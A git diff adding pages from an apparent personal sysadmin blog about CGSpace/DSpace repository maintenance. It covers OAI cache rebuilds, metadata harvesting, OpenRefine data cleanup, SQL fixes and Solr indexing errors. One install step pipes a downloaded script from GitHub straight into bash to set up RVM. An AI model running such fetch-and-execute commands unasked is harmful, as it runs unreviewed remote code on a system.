+<li>OAI: <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:cgspace.cgiar.org:10568/6">https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:cgspace.cgiar.org:10568/6</a></li>
+</ul>
+</li>
+<li>I don&rsquo;t see these fields anywhere in our source code or the database&rsquo;s metadata registry, so maybe it&rsquo;s just a cache issue</li>
+<li>I will have to check the OAI cron scripts on DSpace Test, and then run them on CGSpace</li>
+<li>Running <code>dspace oai import</code> and <code>dspace oai clean-cache</code> have zero effect, but this seems to rebuild the cache from scratch:</li>
+</ul>
+<pre tabindex="0"><code>$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
+...
+63900 items imported so far...
+64000 items imported so far...
+Total: 64056 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 829 seconds.
+</code></pre><ul>
+<li>After reading some threads on the DSpace mailing list, I see that <code>clean-cache</code> is actually only for caching <em>responses</em>, ie to client requests in the OAI web application</li>
+<li>These are stored in <code>[dspace]/var/oai/requests/</code></li>
+<li>The import command should theoretically catch situations like this where an item&rsquo;s metadata was updated, but in this case we changed the metadata schema and it doesn&rsquo;t seem to catch it (could be a bug!)</li>
+<li>Attempting a full rebuild of OAI on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
+...
+58700 items imported so far...
+Total: 58789 items
+Purging cached OAI responses.
+OAI 2.0 manager action ended. It took 1032 seconds.
+
+real    17m20.156s
+user    4m35.293s
+sys     1m29.310s
+</code></pre><ul>
+<li>Now the data for 10568/6 is correct in OAI: <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:cgspace.cgiar.org:10568/6">https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:cgspace.cgiar.org:10568/6</a></li>
+<li>Perhaps I need to file a bug for this, or at least ask on the DSpace Test mailing list?</li>
+<li>I wonder if we could use a crosswalk to convert to a format that CG Core wants, like <code>&lt;date Type=&quot;Available&quot;&gt;</code></li>
+</ul>
+<h2 id="2017-04-13">2017-04-13</h2>
+<ul>
+<li>Checking the <a href="https://dspacetest.cgiar.org/handle/11463/947?show=full">CIFOR item on DSpace Test</a>, it still doesn&rsquo;t have the new metadata</li>
+<li>The collection status shows this message from the harvester:</li>
+</ul>
+<blockquote>
+<p>Last Harvest Result: OAI server did not contain any updates on 2017-04-13 02:19:47.964</p>
+</blockquote>
+<ul>
+<li>I don&rsquo;t know why there were no updates detected, so I will reset and reimport the collection</li>
+<li>Usman has set up a custom crosswalk called <code>dimcg</code> that now shows CG and CIFOR metadata namespaces, but we can&rsquo;t use it because DSpace can only harvest DIM by default (from the harvesting user interface)</li>
+<li>Also worth noting that the REST interface exposes all fields in the item, including CG and CIFOR fields: <a href="https://data.cifor.org/dspace/rest/items/944?expand=metadata">https://data.cifor.org/dspace/rest/items/944?expand=metadata</a></li>
+<li>After re-importing the CIFOR collection it looks <em>very</em> good!</li>
+<li>It seems like they have done a full metadata migration with <code>dc.date.issued</code> and <code>cg.coverage.country</code> etc</li>
+<li>Submit pull request to upstream DSpace for the PDF thumbnail bug (DS-3516): <a href="https://github.com/DSpace/DSpace/pull/1709">https://github.com/DSpace/DSpace/pull/1709</a></li>
+</ul>
+<h2 id="2017-04-14">2017-04-14</h2>
+<ul>
+<li>DSpace committers reviewed my patch for DS-3516 and proposed a simpler idea involving incorrect use of <code>SelfRegisteredInputFormats</code></li>
+<li>I tested the idea and it works, so I made a new patch: <a href="https://github.com/DSpace/DSpace/pull/1709">https://github.com/DSpace/DSpace/pull/1709</a></li>
+<li>I discovered that we can override metadata formats in OAI by creating a new &ldquo;context&rdquo;: <a href="https://wiki.lyrasis.org/display/DSDOC5x/OAI+2.0+Server">https://wiki.lyrasis.org/display/DSDOC5x/OAI+2.0+Server</a></li>
+<li>This allows us to have, say a default &ldquo;request&rdquo; context and a &ldquo;cgiar&rdquo; context, both of which implement the DSpace Intermediate Metadata formats, but have the later use a overridden version that exposes CG metadata</li>
+<li>Compare the following results:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:dspacetest.cgiar.org:10568/6">https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:dspacetest.cgiar.org:10568/6</a></li>
+<li><a href="https://dspacetest.cgiar.org/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:dspacetest.cgiar.org:10568/6">https://dspacetest.cgiar.org/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:dspacetest.cgiar.org:10568/6</a></li>
+</ul>
+</li>
+<li>Reboot DSpace Test server to get new Linode kernel</li>
+</ul>
+<h2 id="2017-04-17">2017-04-17</h2>
+<ul>
+<li>CIFOR has now implemented a new &ldquo;cgiar&rdquo; context in their OAI that exposes CG fields, so I am re-harvesting that to see how it looks in the Discovery sidebars and searches</li>
+<li>See: <a href="https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947">https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947</a></li>
+<li>One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see <code>harvester.autoStart</code> in <code>dspace/config/modules/oai.cfg</code>)</li>
+<li>Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(435) is still referenced from table &#34;bundle&#34;.
+</code></pre><h2 id="2017-04-18">2017-04-18</h2>
+<ul>
+<li>Helping Tsega test his new <a href="https://github.com/ilri/ckm-cgspace-rest-api">CGSpace REST API Rails app</a> on DSpace Test</li>
+<li>Setup and run with:</li>
+</ul>
+<pre tabindex="0"><code>$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
+$ cd ckm-cgspace-rest-api/app
+$ gem install bundler
+$ bundle
+$ cd ..
+$ rails -s
+</code></pre><ul>
+<li>I used Ansible to create a PostgreSQL user that only has <code>SELECT</code> privileges on the tables it needs:</li>
+</ul>
+<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a &#39;db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
+</code></pre><ul>
+<li>Need to look into <a href="https://github.com/puma/puma/blob/master/docs/systemd.md">running this via systemd</a></li>
+<li>This is interesting for creating runnable commands from <code>bundle</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ bundle binstubs puma --path ./sbin
+</code></pre><h2 id="2017-04-19">2017-04-19</h2>
+<ul>
+<li>Usman sent another link to their OAI interface, where the country names are now capitalized: <a href="https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947">https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947</a></li>
+<li>Looking at the same item in XMLUI, the countries are not capitalized: <a href="https://data.cifor.org/dspace/xmlui/handle/11463/947?show=full">https://data.cifor.org/dspace/xmlui/handle/11463/947?show=full</a></li>
+<li>So it seems he did it in the crosswalk!</li>
+<li>Keep working on Ansible stuff for deploying the CKM REST API</li>
+<li>We can use systemd&rsquo;s <code>Environment</code> stuff to pass the database parameters to Rails</li>
+<li>Abenet noticed that the &ldquo;Workflow Statistics&rdquo; option is missing now, but we have screenshots from a presentation in 2016 when it was there</li>
+<li>I filed a ticket with Atmire</li>
+<li>Looking at 933 CIAT records from Sisay, he&rsquo;s having problems creating a SAF bundle to import to DSpace Test</li>
+<li>I started by looking at his CSV in OpenRefine, and I see there a <em>bunch</em> of fields with whitespace issues that I cleaned up:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#34; ||&#34;,&#34;||&#34;).replace(&#34;|| &#34;,&#34;||&#34;).replace(&#34; || &#34;,&#34;||&#34;)
+</code></pre><ul>
+<li>Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:</li>
+</ul>
+<pre tabindex="0"><code>unescape(value,&#34;url&#34;)
+</code></pre><ul>
+<li>Then create the filename column using the following transform from URL:</li>
+</ul>
+<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1].replace(/#.*$/,&#34;&#34;)
+</code></pre><ul>
+<li>The <code>replace</code> part is because some URLs have an anchor like <code>#page=14</code> which we obviously don&rsquo;t want on the filename</li>
+<li>Also, we need to only use the PDF on the item corresponding with page 1, so we don&rsquo;t end up with literally hundreds of duplicate PDFs</li>
+<li>Alternatively, I could export each page to a standalone PDF&hellip;</li>
+</ul>
+<h2 id="2017-04-20">2017-04-20</h2>
+<ul>
+<li>Atmire responded about the Workflow Statistics, saying that it had been disabled because many environments needed customization to be useful</li>
+<li>I re-enabled it with a hidden config key <code>workflow.stats.enabled = true</code> on DSpace Test and will evaluate adding it on CGSpace</li>
+<li>Looking at the CIAT data again, a bunch of items have metadata values ending in <code>||</code>, which might cause blank fields to be added at import time</li>
+<li>Cleaning them up with OpenRefine:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(/\|\|$/,&#34;&#34;)
+</code></pre><ul>
+<li>Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle</li>
+<li>I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/openrefine-flagging-duplicates.png" alt="Flagging and filtering duplicates in OpenRefine"></p>
+<ul>
+<li>Also there are loads of whitespace errors in almost every field, so I trimmed leading/trailing whitespace</li>
+<li>Unbelievable, there are also metadata values like:</li>
+</ul>
+<pre tabindex="0"><code>COLLETOTRICHUM LINDEMUTHIANUM||                  FUSARIUM||GERMPLASM
+</code></pre><ul>
+<li>Add a description to the file names using:</li>
+</ul>
+<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
+</code></pre><ul>
+<li>Test import of 933 records:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
+$ wc -l /tmp/ciat
+933 /tmp/ciat
+</code></pre><ul>
+<li>Run system updates on CGSpace and reboot server</li>
+<li>This includes switching nginx to using upstream with keepalive instead of direct <code>proxy_pass</code></li>
+<li>Re-deploy CGSpace to latest <code>5_x-prod</code>, including the PABRA and RTB XMLUI themes, as well as the PDF processing and CMYK changes</li>
+<li>More work on Ansible infrastructure stuff for Tsega&rsquo;s CKM DSpace REST API</li>
+<li>I&rsquo;m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+</code></pre><h2 id="2017-04-22">2017-04-22</h2>
+<ul>
+<li>Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the <code>cleanup</code> task</li>
+<li>The solution is to remove the ID (ie set to NULL) from the <code>primary_bitstream_id</code> column in the <code>bundle</code> table</li>
+<li>After doing that and running the <code>cleanup</code> task again I find more bitstreams that are affected and end up with a long list of IDs that need to be fixed:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
+</code></pre><h2 id="2017-04-24">2017-04-24</h2>
+<ul>
+<li>Two users mentioned some items they recently approved not showing up in the search / XMLUI</li>
+<li>I looked at the logs from yesterday and it seems the Discovery indexing has been crashing:</li>
+</ul>
+<pre tabindex="0"><code>2017-04-24 00:00:15,578 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
+2017-04-24 00:00:15,586 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (56 of 58853): 74507
+2017-04-24 00:00:15,614 ERROR com.atmire.dspace.discovery.AtmireSolrService @ this IndexWriter is closed
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this IndexWriter is closed
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.deleteByQuery(SolrServer.java:285)
+        at org.apache.solr.client.solrj.SolrServer.deleteByQuery(SolrServer.java:271)
+        at org.dspace.discovery.SolrServiceImpl.unIndexContent(SolrServiceImpl.java:331)
+        at org.dspace.discovery.SolrServiceImpl.unIndexContent(SolrServiceImpl.java:315)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:803)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:876)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:127)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+</code></pre><ul>
+<li>Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;IndexWriter is closed&#39; [dspace]/log/dspace.log.2017-04-*
+[dspace]/log/dspace.log.2017-04-01:0
+[dspace]/log/dspace.log.2017-04-02:0
+[dspace]/log/dspace.log.2017-04-03:0
+[dspace]/log/dspace.log.2017-04-04:0
+[dspace]/log/dspace.log.2017-04-05:0
+[dspace]/log/dspace.log.2017-04-06:0
+[dspace]/log/dspace.log.2017-04-07:0
+[dspace]/log/dspace.log.2017-04-08:0
+[dspace]/log/dspace.log.2017-04-09:0
+[dspace]/log/dspace.log.2017-04-10:0
+[dspace]/log/dspace.log.2017-04-11:0
+[dspace]/log/dspace.log.2017-04-12:0
+[dspace]/log/dspace.log.2017-04-13:0
+[dspace]/log/dspace.log.2017-04-14:0
+[dspace]/log/dspace.log.2017-04-15:0
+[dspace]/log/dspace.log.2017-04-16:0
+[dspace]/log/dspace.log.2017-04-17:0
+[dspace]/log/dspace.log.2017-04-18:0
+[dspace]/log/dspace.log.2017-04-19:0
+[dspace]/log/dspace.log.2017-04-20:2293
+[dspace]/log/dspace.log.2017-04-21:5992
+[dspace]/log/dspace.log.2017-04-22:13278
+[dspace]/log/dspace.log.2017-04-23:22720
+[dspace]/log/dspace.log.2017-04-24:21422
+</code></pre><ul>
+<li>I restarted Tomcat and re-ran the discovery process manually:</li>
+</ul>
+<pre tabindex="0"><code>[dspace]/bin/dspace index-discovery
+</code></pre><ul>
+<li>Now everything is ok</li>
+<li>Finally finished manually running the cleanup task over and over and null&rsquo;ing the conflicting IDs:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
+</code></pre><ul>
+<li>Now running the cleanup script on DSpace Test and already seeing 11GB freed from the assetstore—it&rsquo;s likely we haven&rsquo;t had a cleanup task complete successfully in years&hellip;</li>
+</ul>
+<h2 id="2017-04-25">2017-04-25</h2>
+<ul>
+<li>Finally finished running the PDF thumbnail re-processing on CGSpace, the final count of CMYK PDFs is about 2751</li>
+<li>Preparing to run the cleanup task on CGSpace, I want to see how many files are in the assetstore:</li>
+</ul>
+<pre tabindex="0"><code># find [dspace]/assetstore/ -type f | wc -l
+113104
+</code></pre><ul>
+<li>Troubleshooting the Atmire Solr update process that runs at 3:00 AM every morning, after finishing at 100% it has this error:</li>
+</ul>
+<pre tabindex="0"><code>[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
+[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
+[==================================================&gt;]100% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
+java.lang.RuntimeException: java.lang.ClassNotFoundException: org.dspace.statistics.content.SpecifiedDSODatasetGenerator
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:254)
+	at org.dspace.statistics.content.StatisticsDisplay.&lt;init&gt;(SourceFile:203)
+	at com.atmire.statistics.display.StatisticsGraph.&lt;init&gt;(SourceFile:116)
+	at com.atmire.statistics.display.StatisticsGraphFactory.getStatisticsDisplay(SourceFile:25)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.parseStatisticsDisplay(SourceFile:67)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.getStatisticsDisplays(SourceFile:49)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:178)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:111)
+	at com.atmire.utils.ReportSender$ReportRunnable.run(SourceFile:151)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.SpecifiedDSODatasetGenerator
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1858)
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1701)
+	at java.lang.Class.forName0(Native Method)
+	at java.lang.Class.forName(Class.java:264)
+	at com.atmire.statistics.statlet.XmlParser.parsedatasetGenerator(SourceFile:299)
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:250)
+	... 13 more
+java.lang.RuntimeException: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpaceObjectDatasetGenerator
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:254)
+	at org.dspace.statistics.content.StatisticsDisplay.&lt;init&gt;(SourceFile:203)
+	at com.atmire.statistics.display.StatisticsGraph.&lt;init&gt;(SourceFile:116)
+	at com.atmire.statistics.display.StatisticsGraphFactory.getStatisticsDisplay(SourceFile:25)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.parseStatisticsDisplay(SourceFile:67)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.getStatisticsDisplays(SourceFile:49)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:178)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:111)
+	at com.atmire.utils.ReportSender$ReportRunnable.run(SourceFile:151)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpaceObjectDatasetGenerator
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1858)
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1701)
+	at java.lang.Class.forName0(Native Method)
+	at java.lang.Class.forName(Class.java:264)
+	at com.atmire.statistics.statlet.XmlParser.parsedatasetGenerator(SourceFile:299)
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:250)
+</code></pre><ul>
+<li>Run system updates on DSpace Test and reboot the server (new Java 8 131)</li>
+<li>Run the SQL cleanups on the bundle table on CGSpace and run the <code>[dspace]/bin/dspace cleanup</code> task</li>
+<li>I will be interested to see the file count in the assetstore as well as the database size after the next backup (last backup size is 111M)</li>
+<li>Final file count after the cleanup task finished: 77843</li>
+<li>So that is 30,000 files, and about 7GB</li>
+<li>Add logging to the cleanup cron task</li>
+</ul>
+<h2 id="2017-04-26">2017-04-26</h2>
+<ul>
+<li>The size of the CGSpace database dump went from 111MB to 96MB, not sure about actual database size though</li>
+<li>Update RVM&rsquo;s Ruby from 2.3.0 to 2.4.0 on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
+$ \curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable --ruby
+... reload shell to get new Ruby
+$ gem install sass -v 3.3.14
+$ gem install compass -v 1.0.3
+</code></pre><ul>
+<li>Help Tsega re-deploy the ckm-cgspace-rest-api on DSpace Test</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-05/index.html b/docs/2017-05/index.html
new file mode 100644
index 000000000..ab22f7f11
--- /dev/null
+++ b/docs/2017-05/index.html
@@ -0,0 +1,445 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2017" />
+<meta property="og:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-05/" />
+<meta property="article:published_time" content="2017-05-01T16:21:52+02:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2017"/>
+<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-05/",
+  "wordCount": "2398",
+  "datePublished": "2017-05-01T16:21:52+02:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-05/">
+
+    <title>May, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-05/">May, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-05-01">2017-05-01</h2>
+<ul>
+<li>ICARDA apparently started working on CG Core on their MEL repository</li>
+<li>They have done a few <code>cg.*</code> fields, but not very consistent and even copy some of CGSpace items:
+<ul>
+<li><a href="https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full">https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/73683">https://cgspace.cgiar.org/handle/10568/73683</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2017-05-02">2017-05-02</h2>
+<ul>
